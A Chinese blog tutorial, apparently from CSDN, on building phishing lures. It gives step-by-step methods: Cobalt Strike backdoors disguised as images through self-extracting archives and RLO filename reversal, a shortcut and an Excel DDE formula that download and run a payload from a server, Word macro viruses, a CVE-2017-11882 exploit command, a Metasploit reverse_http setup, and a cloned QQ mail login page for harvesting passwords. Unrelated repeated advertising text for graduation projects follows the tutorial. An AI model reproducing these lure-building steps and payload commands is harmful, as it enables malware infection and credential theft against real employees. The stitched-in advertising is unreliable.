《网络安全0-100》网络钓鱼“骚”姿势[一文就学会]

一、什么是钓鱼

网络钓鱼是通过伪造银行或其他知名机构向他人发送垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。

二、网络钓鱼的基本流程

钓鱼一般分为三个步骤:寻找大鱼,制作鱼饵和抛竿寻找大鱼:我们的目标一般包括:HR、销售、文员等安全意识比较薄弱的人员,以及运维、开发等掌握重要资源的人员。制作鱼饵:一个高质量鱼饵一般分为两部分,一个是邮件内容更加的逼真可信,另一个是邮件的附件尽可能伪装的正常抛竿:最后把鱼竿抛出后就可以坐等鱼上钩了

三、如何制作高质量鱼饵

0x01.自解压+RLO制作思路:

利用自解压文件的特性,解压后令其自动执行解压出来的文件,达到上线的目的,由于自解压文件后缀为exe,很容易被识破,所以我们还需使用RLO后缀反转进行一些伪装。步骤一:用cs生成windows后门

3ede2d8fb1c14470bced39a447bbf541.png

 步骤二:随便准备一张图片,使用WinRAR把后门和图片一块自解压

565aa818110b49938d8163fabdc7cb6e.png

 压缩文件时需在高级——自解压选项中进行一些的设置使木马的执行更加隐蔽:

常规——解压路径:C:\windows\temp

设置——解压后运行:C:\windows\temp\artifact.exe

C:\windows\temp\壁纸.jpg

模式——全部隐藏

更新——更新模式——解压并更新文件

更新——覆盖模式——覆盖所有文件

aa94d81027d64f05be3a5b1d91d61f5c.png

d2efe1feabc746ff8deaf749c1534b7b.png

 步骤三:使用resourcehacker更换文件图标,将其伪装成图片

5d0276907baa46619760b84a28e856eb.png

 步骤四:把文件重命名为壁纸gpj.exe,再使用RLO对后缀进行反转,最后效果如下

24a8fde9049b4959a2b95c86040b77f4.png

 结合邮件钓鱼等方式把“图片”放送给他人,引诱他人上钩

对方双击“图片”后,会同时执行artifact.exe和壁纸.jpg,而且上线cs

c9baae55ed6b4caaa079fdea3bb524b7.png

 0x02.快捷方式制作思路:

运行快捷键方式时,执行命令让其下载我们提前放在服务器上的后门程序并且运行

步骤一:cs生成后门,放到服务器网站目录下

aba23073e9d6478bbca8bd816b917d9c.png

 步骤二:创建快捷方式,在目标中写入以下代码

C:\Windows\System32\cmd.exe /k curl http://xxx.xxx.xxx.xxx/exe/artifact.exe --output C:\Windows\temp\win.exe && C:\Windows\temp\win.exe

4489f964072d4142aa8ec5b0a36b148a.png

 步骤三:更换图标,增加其真实性

adff4b0d4fc54850b12caa46f13aeb61.png

284461a27c14430c8d760b5b1c808bcb.png 

 当对方双击快捷键方式时就会下载我们准备好的artifact.exe并且执行

3dcca45d74784c149caec8702edae318.png

 0x03.Word宏病毒

宏病毒是Word中被嵌入的带有恶意行为的宏代码(VBA代码),当我们双击打开带有宏病毒的word文档的时候它的宏代码会自动运行。步骤一:使用cs生成恶意vba代码

86ef3415b4554a43803f2ae03d01df3f.png

8fdac43367314ee5bfed085007f2ff72.png 

 步骤二:新建doc文档,创建宏,保存即可

dfdaffcf74e345f582b2c435993b58ec.png

 步骤三:再次打开文件后提示是否启用宏,点击启用就会上线cs

5eddeb3117e54ac6a6264ed8f79d6fd5.png

7e3c9fb21975426db67efa270ff0c7e9.png 

 0x04.Excel注入

Excel注入是一种将包含恶意命令的excel公式插入到可以导出csv或xls等格式的文本中,当在excel中打开xls文件时,文件会转换为excel格式并提供excel公式的执行功能,从而造成命令执行。

利用excel注入弹出计算器

注入代码:=cmd| '/c calc'! '!A1'

39fe4041d60146a9857ee9384dc021ea.png

3cc17142ca014d478a73abe8258ea704.png 

 利用excel注入上线cs步骤一:

使用cs生成exe后门,并放到服务器上

2958714de13f445a9b886e8126dca791.png

 步骤二:更换恶意代码

=cmd| '/c curl http://xxx.xxx.xxx.xxx/beacon.exe --output C:\Windows\temp\win.exe && C:\Windows\temp\win.exe' ! 'A1'

da24d8b51f8b4ce0a006b20142129aa1.png

 当双击打开该excel时就会执行恶意代码下载cs后门并运行 ,上线cs 

1ee855c3eb17450ea50cf9174c785002.png

 0x05.CVE-2017-11882

cve-2017-11882漏洞也是word钓鱼的一种方式,相比宏病毒更加的隐蔽,把word伪装成某某通知文件,目标点击后就直接可以直接上线。

利用cve-2017-11882弹出计算器:

下载poc:https://github.com/Ridter/CVE-2017-11882

生成带有病毒的word文件

python2 Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

 552b757287154501ac3740c411cb143d.png

 双击test.doc,弹出计算器

ea213cb03aa745fb8f945f58fc6fac28.png

 利用cve-2017-11882上线msf

步骤一:使用exploit/windows/misc/hta_server生成病毒

use exploit/windows/misc/hta_serverset payload windows/meterpreter/reverse_httpset lport 4444show optionsexploit

935bb84e72d04db8ae7476c113ade285.png

 步骤二:生成带病毒的doc文件并伪装为通知文件

d2667f80651e49eaa70708cbfa2e4f0a.png

 受害人打开word,msf就会上线shell

743badd2829c4c5fa6aa48a344a266d8.png

 四、邮件伪造

Swaks

Swaks是kali自带的一款邮件伪造工具,通过swaks可以向任意目标发送任意内容的邮件

819e2c79d8b2405fb1ac8a77dfce4889.png

6679f07f52a34e0bbffbefde99296ba5.png 

 现在的邮箱都有某种检测机制,要想他人发邮件,这种方法就不太行了

Gophish

Gophish是一个开源的钓鱼工具包,自带web面板,对于邮件编辑、网站克隆、数据可视化、批量发送等功能的使用带来的极大的便捷。

伪造中奖通知邮件,发送附件

b6029a51fa6645748719d86ebc497765.png

 效果看着还可以,文件再免杀一下就更好了

ca79a21314a74a539ed7feef3f550fea.png

 第二种方法,邮件正文中插入克隆网站

2fda2d9bcc8745279225a8cb907d0a4f.png

 然后克隆一个qq邮箱的登录页面,引诱其输入账户密码

16cb71183c07494b9d96a89c0413aa29.png

400e0b99158d40ff84a9f76fb6ee9f42.png 

 如果对方提交输入账户密码就会在gophish中显示出来

459594780cbf4b96a38f8befa7fa8066.png

 五、网站克隆

0x01、setoolkit说到克隆网站,kali上自带的setoolkit给我们提供了很大的方便,不仅可以记录用户提交的数据,还可以进行注入攻击setoolkit克隆网站

1、启动setoolkit,选者1,社工攻击

1) Spear-Phishing Attack Vectors【鱼叉式网络钓鱼攻击】

2) Website Attack Vectors【web网站式攻击-钓鱼(常用)】

3) Infectious Media Generator【传染性木马】

4) Create a Payload and Listener【创建payload和监听器】

5) Mass Mailer Attack【邮件群发攻击】

6) Arduino-Based Attack Vector【基于安卓的攻击】

7) Wireless Access Point Attack Vector【wifi攻击】

8) QRCode Generator Attack Vector【生成二维码(就普通二维码)】 9) Powershell Attack Vectors【Powershell攻击】 10) Third Party Modules【第三方模块】

 

 

 

weixin073智慧旅游平台开发微信小程序+ssm后端毕业源码案例设计 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。
python017基于Python贫困生资助管理系统带vue前后端分离毕业源码案例设计 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全仔的日记

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值